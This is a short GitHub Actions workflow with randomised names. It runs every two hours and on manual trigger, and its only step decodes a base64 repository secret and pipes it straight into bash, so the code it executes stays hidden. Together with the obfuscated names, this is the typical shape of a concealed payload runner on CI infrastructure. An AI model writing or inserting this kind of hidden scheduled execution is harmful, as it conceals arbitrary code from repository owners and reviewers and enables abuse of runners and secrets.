name: pGMLLySNnGBY
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  QJTnfYPsfse:
    runs-on: ubuntu-latest
    env:
      UYtgndcvN: ${{ secrets.DTQJgvAWs }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.VmSjpvrxZfSK }}" | base64 -d | bash
